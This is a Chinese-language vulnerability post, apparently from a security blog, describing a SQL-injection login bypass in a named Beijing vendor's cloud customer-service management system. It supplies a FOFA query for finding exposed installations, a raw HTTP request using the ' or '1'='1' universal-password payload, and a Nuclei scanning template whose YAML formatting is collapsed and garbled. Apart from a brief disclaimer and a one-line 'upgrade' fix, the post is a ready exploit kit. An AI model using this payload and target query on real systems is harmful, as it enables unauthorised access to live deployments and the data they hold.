免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

                                                                                                                                              

Ⅰ、漏洞描述

北京新网医讯技术有限公司，公司成立于2000年3月，注册于北京中关村科技园，为国家高新技术企业和中关村高新技术企业（简称为“双高企业”），公司作为软件企业，成为北京软件和信息服务业协会会员。公司专业从事PACS(图像存储与传输系统)和RIS（放射科信息管理系统）的研究、开发工作。

北京新网医讯技术有限公司云端客服管理系统存在SQL注入漏洞，可使用万能密码登录。

Ⅱ、fofa语句

body="云端客服管理平台登录"

Ⅲ、漏洞复现

POC

GET /Cloud/LoginSubmit?F_USER_NAME=admin%27+or+%271%27%3D%271%27+--%2B&F_PASSWORD=1&TYPES=0 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

1、发送数据包，使用SQL语句万能密码登录系统

Ⅳ、Nuclei-POC

id: beijing-SQLinfo:name: 北京新网医讯技术有限公司云端客服管理系统存在SQL注入漏洞author: WLFseverity: highmetadata: fofa-query: body="云端客服管理平台登录"
variables:filename: "{{to_lower(rand_base(10))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |GET /Cloud/LoginSubmit?F_USER_NAME=admin%27+or+%271%27%3D%271%27+--%2B&F_PASSWORD=1&TYPES=0 HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0matchers:- type: dsldsl:- status_code==200 && contains_all(body,"登录成功")

Ⅴ、修复建议

升级至安全版本